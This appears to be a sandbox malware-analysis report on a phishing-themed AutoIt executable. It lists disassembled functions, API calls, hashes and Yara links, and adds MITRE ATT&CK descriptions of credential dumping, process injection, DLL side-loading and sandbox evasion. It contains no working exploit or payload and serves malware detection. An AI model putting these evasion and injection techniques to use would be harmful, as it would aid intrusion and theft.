Instruction ID: 6b79b1e17ca0fd64a79b52242c9d61dd04852e453146ff2ea70243786e323489
Opcode Fuzzy Hash: 5eca0a0601a7f9b7840933b6cb6c41531181482ee59eb5910e24459a72ed0155
Instruction Fuzzy Hash: E3113AB2A10209AFDF01DFA8CC46EEA7BF8FB08314F008918F955E2250D735E951DB51

Function 009ACD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009ACD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009ACDA6

Strings

<local>, xrefs: 009ACD66

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: fbf83807c4e36da04f1e68bb369580ab696452c4efabe66e9b9406dabb0f464a
Instruction ID: 451510f2cc07c9886534c4e4874f1bc208e4ebaba41951371057121f1bca5e91
Opcode Fuzzy Hash: fbf83807c4e36da04f1e68bb369580ab696452c4efabe66e9b9406dabb0f464a
Instruction Fuzzy Hash: E011CEF1615636BAD7384B668C89EF7BEACEF137A4F00462AB1199B1C0D7749840D6F0

Function 009C3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 009C34AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009C34BA

Strings

edit, xrefs: 009C348F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 47ece43756804b1d6f37d9a0ca8227212f915e39901af0568fd5b68442476400
Instruction ID: 272ca286632317d24f53c71959fdefd9266f349cb6d400de9a34a86fa044f184
Opcode Fuzzy Hash: 47ece43756804b1d6f37d9a0ca8227212f915e39901af0568fd5b68442476400
Instruction Fuzzy Hash: 2B119A71900208AAEB168F64DC80FEB3BAEEB45378F50C728F964931E0C731DD519B62

Function 00996C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

CharUpperBuffW.USER32(?,?,?), ref: 00996CB6
_wcslen.LIBCMT ref: 00996CC2

Strings

STOP, xrefs: 00996CBC, 00996CC1

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 1b855c72fb0a629ac37ab935960236a1326fc19a9b04b8fc1a4373a8d36db2e7
Instruction ID: fe1747479321e29c991d5ee3922c925f321bd2bac8635263a2ba9cdf3457a27b
Opcode Fuzzy Hash: 1b855c72fb0a629ac37ab935960236a1326fc19a9b04b8fc1a4373a8d36db2e7
Instruction Fuzzy Hash: C2010432A145268BCF219FBDDC80ABF37A8EBA0710B010924F9A296190FB31E840C750

Function 00991CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

Part of subcall function 00993CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00993CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00991D4C

Strings

ComboBox, xrefs: 00991CEB
ListBox, xrefs: 00991D16

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 6d407fb8cd73695779d3a492f5fbd96c0393d0a58264640d693abeb8d886fe0a
Instruction ID: 842de6a4a7c561e55b07b282992f6d81980dd52f81f45530393b62976f29e287
Opcode Fuzzy Hash: 6d407fb8cd73695779d3a492f5fbd96c0393d0a58264640d693abeb8d886fe0a
Instruction Fuzzy Hash: 6C01D871601219AB8F08EFA8CD55EFE77A8FF86350F040919F866572C1EA705908CB60

Function 00991BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

Part of subcall function 00993CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00993CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00991C46

Strings

ComboBox, xrefs: 00991BE5
ListBox, xrefs: 00991C10

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: f9791617e86219e20fc92e06d345519e9816eaa17ea56ca225475785a4bda546
Instruction ID: 05af725c1727afa8f9d050f09905c68ebe6c0a6a31c465bcc5c9247b1ad416c8
Opcode Fuzzy Hash: f9791617e86219e20fc92e06d345519e9816eaa17ea56ca225475785a4bda546
Instruction Fuzzy Hash: BA01A775A8510967CF05EB94CA52FFF77ACAF91340F140019B99667281FA649E08C7B1

Function 00991C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

Part of subcall function 00993CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00993CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00991CC8

Strings

ComboBox, xrefs: 00991C69
ListBox, xrefs: 00991C94

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: a31bd7e4f38ef0884439552bbc837d913924cdfe4bc7f3eb6da77640a44c1744
Instruction ID: 63d37abfc3890ca828481101dcb9070a913634ed00b152e0309b85030d24344f
Opcode Fuzzy Hash: a31bd7e4f38ef0884439552bbc837d913924cdfe4bc7f3eb6da77640a44c1744
Instruction Fuzzy Hash: 5401D6B5A8011967CF04EBA8CB01FFE77ECAB91340F540415B986B3281FAA19F08C671

Function 009B747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009B7493
_wcslen.LIBCMT ref: 009B74B9

Strings

3, 3, 16, 1, xrefs: 009B7483

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 11e8a8f11e00e98def3571d22245c616f91da413620ad70d88ac99dd3a572c46
Instruction ID: 3698d26eee9d5fbd167a76efec35466392adcb459dbb9fc6abb4bf1ee9ed477a
Opcode Fuzzy Hash: 11e8a8f11e00e98def3571d22245c616f91da413620ad70d88ac99dd3a572c46
Instruction Fuzzy Hash: F2E0230160421010527112F7ADC27BFE68FCFC57B27101417FD41C1276D6948DD153A1

Function 00990B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00990B23

Strings

Error allocating memory., xrefs: 00990B1C
AutoIt, xrefs: 00990B17

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 5549ad51d2c6b934097ee63ae2c7067cb0c5ff7cb62a5e16d3432833f7ffacc9
Instruction ID: ac0d9a24f6af02bafdea127ad809431aeb5d5dd2c9978348171d32ea3f343908
Opcode Fuzzy Hash: 5549ad51d2c6b934097ee63ae2c7067cb0c5ff7cb62a5e16d3432833f7ffacc9
Instruction Fuzzy Hash: 69E0D8316843083AD61436547C03FC97E848F45B15F10042AFB9C554C38AE1249016A9

Function 00950D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0094F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00950D71,?,?,?,0093100A), ref: 0094F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0093100A), ref: 00950D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0093100A), ref: 00950D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00950D7F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: c5546cadf29abaa3d9e8a278d37a9e7f68d47e1982c01bc8c609cee6ac8725a7
Instruction ID: ec5ebe480e5a3107e3414c8d965c0f91a55e4b5f122140d15d42049894983064
Opcode Fuzzy Hash: c5546cadf29abaa3d9e8a278d37a9e7f68d47e1982c01bc8c609cee6ac8725a7
Instruction Fuzzy Hash: 94E092B06003418BD370DFB9D414B467BF4AF44745F004D2DE896C7691DBB4E449CBA2

Function 009A3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 009A302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 009A3044

Strings

aut, xrefs: 009A3038

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 93078e588e6e2fa275f5a1422e345749edd9abd863f71319dd56e9051d18bb7c
Instruction ID: 733cd4d3e6d19c1ceb3976d1ad00659eb3f45a07ff2fe8562d19f45546c0a508
Opcode Fuzzy Hash: 93078e588e6e2fa275f5a1422e345749edd9abd863f71319dd56e9051d18bb7c
Instruction Fuzzy Hash: 1BD05EB290032877DA20E7A4AC0EFDB3E6CDB04750F4002A1B669E2095DAB0D984CBE0

Function 0098D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0098D220

Strings

%.3d, xrefs: 0098D22B
X64, xrefs: 0098D2A8

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 8804ea9416ad6ae36bcde7fbb8fe156f2896021c90a9ad0f6cd12f4c2de35319
Instruction ID: a06d23e2df49ddcf3ef0a5821520e6d39fd681687f888945b24e29e511e00119
Opcode Fuzzy Hash: 8804ea9416ad6ae36bcde7fbb8fe156f2896021c90a9ad0f6cd12f4c2de35319
Instruction Fuzzy Hash: 6ED012A1C0A109F9CB50A6D0DC49DB9B37CEB48301F508852F92AA2180D62CD508A761

Function 009C2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009C232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009C233F

Part of subcall function 0099E97B: Sleep.KERNEL32 ref: 0099E9F3

Strings

Shell_TrayWnd, xrefs: 009C2325

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 642522ec0f933d851ebcd24f82a1744b3fc522816292fd7ee34045ed796319f6
Instruction ID: 0d6711ff2bfd95b10dfe4fa18974926d0dd8a07d902e24df520777ff7768b546
Opcode Fuzzy Hash: 642522ec0f933d851ebcd24f82a1744b3fc522816292fd7ee34045ed796319f6
Instruction Fuzzy Hash: E7D01276BA8350B7E764B771DD0FFD67E189B40B14F00491AB74AEA1D0C9F4A801DB54

Function 009C2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009C236C
PostMessageW.USER32(00000000), ref: 009C2373

Part of subcall function 0099E97B: Sleep.KERNEL32 ref: 0099E9F3

Strings

Shell_TrayWnd, xrefs: 009C2365

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: aaba6563299a803c89bceeaa47002053e8b1d821f590227ea5942a8c2731aac4
Instruction ID: 52ade3d050137ea62f11260829fbbf9a6de06d4d7e5a88e1c82e670d4b955c78
Opcode Fuzzy Hash: aaba6563299a803c89bceeaa47002053e8b1d821f590227ea5942a8c2731aac4
Instruction Fuzzy Hash: CAD0C972B993507AE664B7719D0FFC66A189B44B14F00491AB74AEA1D0C9A4A8019B58

Function 0096BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0096BE93
GetLastError.KERNEL32 ref: 0096BEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0096BEFC

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 22143df26d108c4f7c8b98f1b7685c4a3545f4900c11fe1cce9651affc3e6699
Instruction ID: 7ba38d488b2043a4b6cd3eb8f0bf8482b57810fe4565d08751feebba6575aa77
Opcode Fuzzy Hash: 22143df26d108c4f7c8b98f1b7685c4a3545f4900c11fe1cce9651affc3e6699
Instruction Fuzzy Hash: C041F735604206AFCF219FA5CC54BBA7BA9EF41320F144169F959DB1B1FB318D81DBA0

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

